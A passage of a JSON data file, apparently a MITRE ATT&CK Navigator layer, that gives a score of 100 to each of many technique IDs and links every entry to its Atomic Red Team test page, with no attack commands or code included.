:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"com
ment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100
,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"htt
ps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master
/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/at
omics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"
T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanary
co/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob
/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-
red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/re
